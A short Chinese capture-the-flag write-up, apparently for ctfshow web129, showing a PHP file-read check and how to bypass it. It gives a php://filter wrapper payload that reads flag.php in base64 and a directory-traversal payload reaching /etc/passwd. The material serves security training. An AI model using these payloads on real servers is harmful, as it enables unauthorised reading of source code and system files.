if(isset($_GET['f'])){
$f = $_GET['f'];
if(stripos($f, 'ctfshow')>0){
echo readfile($f);
}
}用php伪协议绕过,filter伪协议支持多种编码方式,无效的就被忽略掉了。
payload:?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php
也可以利用目录穿越。
?f=./ctfshow/../../../../../../etc/passwd标签:..,GET,ctfshow,web129,php,穿越 From: https://www.cnblogs.com/meng-han/p/16807669.html